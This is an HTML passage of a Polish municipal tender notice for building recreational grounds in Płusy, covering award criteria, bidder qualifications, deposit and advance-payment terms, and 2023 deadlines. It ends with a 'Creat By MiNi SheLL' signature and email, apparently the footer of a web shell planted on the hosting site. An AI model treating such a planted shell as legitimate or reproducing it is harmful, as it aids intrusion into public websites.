dotyczących zatrudniania przez wykonawcę lub podwykonawcę osób na podstawie stosunku pracy został opisany w SWZ i projekcie umowy.<br/>4.	Zamawiający nie przewiduje przeprowadzenia wizji lokalnej oraz sprawdzenia przez wykonawcę dokumentów niezbędnych do realizacji zamówienia dostępnych na miejscu u zamawiającego.<br/>5.	Zgodnie z art. 100 ust. 1 Zamawiający wymaga aby Wykonawca podczas prac budowlanych uwzględnił dostępność wykonanej inwestycji dla wszystkich użytkowników w tym osób niepełnosprawnych w zakresie wejścia na teren rekreacyjny w szczególność w zakresie ukształtowania progów, krawężników a także ułożenia nawierzchni </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45212200-8 - Roboty budowlane w zakresie budowy obiektów sportowych</p> <p class="mb-0">45233250-6 - Roboty w zakresie nawierzchni, z wyjątkiem dróg</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">105 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Cena 60%, okres gwarancji jakościowej 40%. Zamawiający dokona oceny ofert przyznając punkty w<br/>ramach poszczególnych kryteriów oceny ofert, przyjmując zasadę, że 1%=1 punkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji jakościowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy nie podlegają wykluczeniu oraz spełniają określone przez zamawiającego warunki udziału <br/>w postępowaniu.<br/>2.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym określa się minimalne poziomy zdolności dotyczące:<br/>zamawiający nie określa warunku w w/w. zakresie;<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów określa się minimalne poziomy zdolności dotyczące: <br/>zamawiający nie określa warunku w w/w. zakresie;<br/>3)	sytuacji ekonomicznej lub finansowej określa się minimalne poziomy zdolności dotyczące: <br/>zamawiający nie określa warunku w w/w. zakresie;<br/>4)	zdolności technicznej lub zawodowej określa się minimalne poziomy zdolności dotyczące:<br/>a)	posiada wiedze i doświadczenie:<br/>zamawiający nie określa warunku w w/w. zakresie;<br/>b)	dysponuje osobami zdolnymi do wykonania zamówienia:<br/>Wykonawca spełni Warunek dotyczący osób jeśli wykaże dysponowanie osobami, które zostaną skierowane przez Wykonawcę do realizacji zamówienia legitymującymi się odpowiednimi kwalifikacjami zawodowymi, uprawnieniami i doświadczeniem odpowiednim do funkcji jaka zostanie im powierzona w zakresie prowadzenia nadzoru nad wykonaniem prac tj. <br/>•	osobą pełniącą funkcję kierownika budowy posiadającą doświadczenie zawodowe min. 1 rok w pełnieniu funkcji kierownika budowy lub kierowania robót do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń;<br/>•	osobą pełniącą funkcję kierownika robót budowlanych posiadającą doświadczenie zawodowe min. 1 rok w pełnieniu funkcji kierownika budowy lub kierowania robót posiadającą odpowiednie uprawnienia budowlane do kierowania robotami budowlanymi w specjalności w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstawa do wykluczenia z udziału w postępowaniu:<br/>a)	oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (t.j. Dz. U. z 2021 r. poz. 275 z późn. zm.), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – zgodnie z Załącznikiem nr 7 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania warunków udziału w postępowaniu:<br/>a)	wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – zgodnie z Załącznikiem nr 6 do SWZ</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) oświadczenie, o którym mowa w art. 125 ust. 1 ustawy, składa każdy z wykonawców.<br/>Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w<br/>postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału<br/>w postępowaniu lub kryteriów;<br/>2) oświadczenie, z którego wynika, które roboty budowlane wykonują poszczególni wykonawcy,<br/>o którym mowa w rozdz. 6 pkt. 5 SWZ .<br/>2. W przypadku polegania przez wykonawcę na zdolnościach lub sytuacji podmiotów<br/>udostępniających zasoby:<br/>1) przedstawia, wraz z oświadczeniem, o którym mowa w art. 125 ust. 1 ustawy, także<br/>oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia<br/>tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie, w<br/>jakim wykonawca powołuje się na jego zasoby;<br/>2) zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych<br/>zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy<br/>potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi<br/>zasobami tych podmiotów, o którym mowa w rozdz. 9 pkt 1 ppkt 4 SWZ;3. Dokumenty, z których<br/>wynika potwierdzenie umocowania do działania w imieniu wykonawcy<br/>a) odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i informacji o Działalności Gospodarczej lub innego właściwego rejestru, chyba, że zamawiający<br/>może je uzyskać za pośrednictwem bezpłatnych i ogólnodostępnych baz danych, a wykonawca<br/>w formularzu oferty wskazał dane umożliwiające dostęp do tych dokumentów w odniesieniu do<br/>wykonawcy, wykonawców wspólnie ubiegających się o zamówienie, jak również w odniesieniu do podmiotów udostępniających zasoby;<br/>b) w przypadku wskazania przez wykonawcę dostępności dokumentów o których mowa w lit. a,<br/>pod określonymi adresami internetowymi ogólnodostępnych i bezpłatnych baz danych,<br/>zamawiający może żądać od wykonawcy przedstawienia tłumaczenia na język polski pobranych<br/>samodzielnie przez zamawiającego podmiotowych środków dowodowych lub dokumentów;<br/>c) pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do reprezentowania<br/>wykonawcy, jeżeli w imieniu wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów, o których mowa w lit. a;<br/>d) pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie osoby<br/>działającej w imieniu wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>publicznego, pełnomocnik może być ustanowiony do reprezentowania wykonawców w<br/>postępowaniu albo do reprezentowania w postępowaniu i zawarciu umowy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca jest zobowiązany do wniesienia wadium w wysokości: 8 000,00 zł, (słownie zł: osiem tysięcy 00/100); <br/>2.	Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2. ustawy Pzp. <br/>3.	Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących formach:<br/>1)	pieniądzu;<br/>2)	gwarancjach bankowych;<br/>3)	gwarancjach ubezpieczeniowych;<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r. poz. 299).<br/>4.	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy zamawiającego:<br/>Gminy Księżpol ul. Biłgorajska 12, 23-415 Księżpol, <br/>Lubelski Bank Spółdzielczym Oddział w Księżpolu <br/>nr rachunku: 71 9614 0008 2001 0000 0967 0001<br/>z adnotacją Budowa ogólnodostępnych terenów rekreacyjnych w miejscowości Płusy<br/>– Znak sprawy: BGK.271.1.7.2023”.<br/>5.	Zamawiający zaleca by wpłaty wadium były dokonywane ze znacznym wyprzedzeniem ze względu na powstanie ryzyka opóźnienia związanego z czasem trwania okresu rozliczeń międzybankowych.<br/>6.	Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt 3 ppkt 2-4, wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej. Wadium takie obejmować cały okres związania z ofertą. Treść gwarancji lub poręczenia nie może zawierać postanowień uzależniających jego dalsze obowiązywanie od zwrotu oryginału dokumentu gwarancyjnego do gwaranta.<br/>7.	Jako Beneficjenta wadium wnoszonego w formie gwarancji lub poręczeń należy wskazać Gmina Księżpol, ul. Biłgorajska 12, 23-415 Księżpol.<br/>8.	W przypadku, o którym mowa w pkt 6, gwarancja lub poręczenie musi obejmować odpowiedzialność za wszystkie przypadki, o których mowa w art. 98 ust. 6 ustawy Pzp.<br/>9.	Gwarancja lub poręczenie musi zawierać w treści nieodwołalne i bezwarunkowe zobowiązanie wykonawcy dokumentu do zapłaty na rzecz zamawiającego kwoty wadium – płatne na pierwsze pisemne żądanie zamawiającego.<br/>10.	W gwarancji lub poręczeniu musi zostać podany adres e-maila oraz adres pocztowy, na który zamawiający prześle oświadczenie o zwolnieniu wadium.<br/>11.	Dochodzenie roszczenia z tytułu wadium wniesione w formie gwarancji bankowej czy ubezpieczeniowej nie może być utrudnione. W treści gwarancji powinna znaleźć się klauzula stanowiąca, iż wszystkie spory rozstrzygane będą zgodnie z prawem polskim i poddane jurysdykcji sądów polskich, chyba, że wynika to z przepisów prawa. <br/>12.	Warunki zwrotu i zatrzymania wadium są określone w art. 98 ust. 1-5 ustawy Pzp.<br/>13.	Zatrzymanie wadium wraz z odsetkami następuje w przypadku, o którym mowa w art. 98 ust. 6 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców:<br/>1) oświadczenie, o którym mowa w art. 125 ust. 1 ustawy, składa każdy z wykonawców.<br/>Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w<br/>postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału<br/>w postępowaniu lub kryteriów;<br/>2) oświadczenie, z którego wynika, które roboty budowlane wykonują poszczególni wykonawcy,<br/>o którym mowa w rozdz. 6 pkt. 5 SWZ .<br/>2. W przypadku polegania przez wykonawcę na zdolnościach lub sytuacji podmiotów<br/>udostępniających zasoby:<br/>1) przedstawia, wraz z oświadczeniem, o którym mowa w art. 125 ust. 1 ustawy, także<br/>oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia<br/>tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie, w<br/>jakim wykonawca powołuje się na jego zasoby;<br/>2) zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych<br/>zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy<br/>potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi<br/>zasobami tych podmiotów, o którym mowa w rozdz. 9 pkt 1 ppkt 4 SWZ;3. Dokumenty, z których<br/>wynika potwierdzenie umocowania do działania w imieniu wykonawcy<br/>a) odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i informacji o Działalności Gospodarczej lub innego właściwego rejestru, chyba, że zamawiający<br/>może je uzyskać za pośrednictwem bezpłatnych i ogólnodostępnych baz danych, a wykonawca<br/>w formularzu oferty wskazał dane umożliwiające dostęp do tych dokumentów w odniesieniu do<br/>wykonawcy, wykonawców wspólnie ubiegających się o zamówienie, jak również w odniesieniu do podmiotów udostępniających zasoby;<br/>b) w przypadku wskazania przez wykonawcę dostępności dokumentów o których mowa w lit. a,<br/>pod określonymi adresami internetowymi ogólnodostępnych i bezpłatnych baz danych,<br/>zamawiający może żądać od wykonawcy przedstawienia tłumaczenia na język polski pobranych<br/>samodzielnie przez zamawiającego podmiotowych środków dowodowych lub dokumentów;<br/>c) pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do reprezentowania<br/>wykonawcy, jeżeli w imieniu wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów, o których mowa w lit. a;<br/>d) pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie osoby<br/>działającej w imieniu wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>publicznego, pełnomocnik może być ustanowiony do reprezentowania wykonawców w<br/>postępowaniu albo do reprezentowania w postępowaniu i zawarciu umowy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> 1) Zamawiający udziela wykonawcy zaliczki na poczet wykonania zamówienia w wysokości 2% wynagrodzenia brutto wskazanego w § 7 ust. 2 umowy i jednocześnie nieprzekraczającej wysokości wkładu własnego do zadania współfinansowanego ze środków z Rządowego Funduszu Polski Ład;<br/>2) Zaliczka, o której mowa w ppkt 1 zostanie Wykonawcy przekazana w formie jednorazowej płatności;<br/>3) płatność zaliczki nastąpi przelewem na rachunek bankowy Wykonawcy nie później niż w terminie 30 dni po otrzymaniu faktury zaliczkowej, do której Wykonawca dołączy dokument potwierdzający zabezpieczenie zaliczki, o którym mowa w ppkt 7;<br/>4) faktura zaliczkowa zostanie wystawiona z uwzględnieniem przepisów art. 108a ust. 1a ustawy o podatku od towarów i usług i będzie zawierała adnotację „mechanizm podzielonej płatności”, Wykonawca wystawi fakturę zaliczkową w terminie do 30 dni od dnia podpisania umowy;<br/>5) w przypadku gdy wkład własny Zamawiającego współfinansowanego zadania ze środków z Rządowego Funduszu Polski Ład jest większy niż 2% pozostałą część wkładu własnego Zamawiający przewiduje wypłacić do terminu zakończenia realizacji przedmiotu zamówienia w formie kolejnej zaliczki do wysokości posiadanych środków wkładu własnego po wykazaniu przez Wykonawcę, że wykonał zamówienie w zakresie wartości poprzednio udzielonej zaliczki oraz po przedstawieniu przez Wykonawcę dokumentu potwierdzającego zabezpieczenie zaliczki, o którym mowa w ppkt 7;<br/>6) pozostałe wynagrodzenie Wykonawcy zostanie zapłacone po dokonaniu odbioru końcowego, zgodnie z postanowieniami § 6 ust. 11 umowy, a zapłacona zaliczka zostanie zaliczona po wykonaniu całości zamówienia na poczet wynagrodzenia Wykonawcy;<br/>7) Wykonawca zobowiązany jest dodatkowo do wniesienia zabezpieczenia zaliczki zgodnie z art. 442 ust. 3 ustawy Prawo zamówień publicznych;<br/>8) zabezpieczenie zaliczki ustala się w wysokości odpowiadającej 100 % kwoty zaliczki;<br/>9) zabezpieczenie zaliczki może być wniesione w formie:<br/>a) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym;<br/>b) gwarancji bankowych;<br/>c) gwarancji ubezpieczeniowych;<br/>d) poręczeń udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości;<br/>10) zabezpieczenie musi być ustanowione zgodnie z prawem polskim i podlegać prawu polskiemu;<br/>11) dokument gwarancji/poręczenia wymaga akceptacji Zamawiającego przed jego podpisaniem przez gwaranta/poręczyciela;<br/>12) dokument gwarancji/poręczenia wystawiony przez podmiot zagraniczny powinien posiadać tłumaczenie przysięgłe na język polski;<br/>13) w przypadku, gdy dokumenty potwierdzające wniesienie zabezpieczenia zaliczki wystawi podmiot zagraniczny dokumenty te winny zawierać klauzulę, iż wszelkie prawa i obowiązki wynikające z wystawionych dokumentów podlegają prawu polskiemu, spory będą rozstrzygane przez polski sąd;<br/>14) Zamawiający nie dokona wypłaty zaliczki w sytuacji braku lub niezgodnego z umową lub przepisami ustawy Prawo zamówień publicznych lub z SWZ jej zabezpieczenia;<br/>15) dokument potwierdzający zabezpieczenie zaliczki musi zawierać bezwarunkowe i nieodwołalne zobowiązanie gwaranta/poręczyciela do wypłaty na rzecz zamawiającego kwoty zaliczki na pierwsze żądanie zamawiającego zawierające oświadczenie, że Wykonawca, pomimo pisemnego wezwania, nie rozliczył przekazanej mu zaliczki, zgodnie z umową;<br/>16) Zamawiający dokona zwrotu zabezpieczenia zaliczki w terminie 30 dni po przeprowadzeniu czynności sprawdzających w zakresie potwierdzenia wykonania robót o wartości, co najmniej udzielonej zaliczki;<br/>17) Wykonawca jest zobowiązany utrzymać aktualność zabezpieczenia zaliczki do czasu potwierdzenia przez Zamawiającego, że prace odpowiadające wysokości udzielonej zaliczki zostały prawidłowo wykonane;<br/>18) wypłata zaliczek nastąpi w terminie 30 dni od dnia złożenia wymaganych dok. <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Projekt umowy stanowi Załącznik Nr 8 do SIWZ.<br/>2.	Zamawiający przewiduje możliwości wprowadzenia zmian do zawartej umowy, na zasadach określonych w ustawie Pzp, oraz w sposób i na warunkach określonych w projekcie umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-04-18 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://pzp.ksiezpol.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-04-18 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-05-17</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com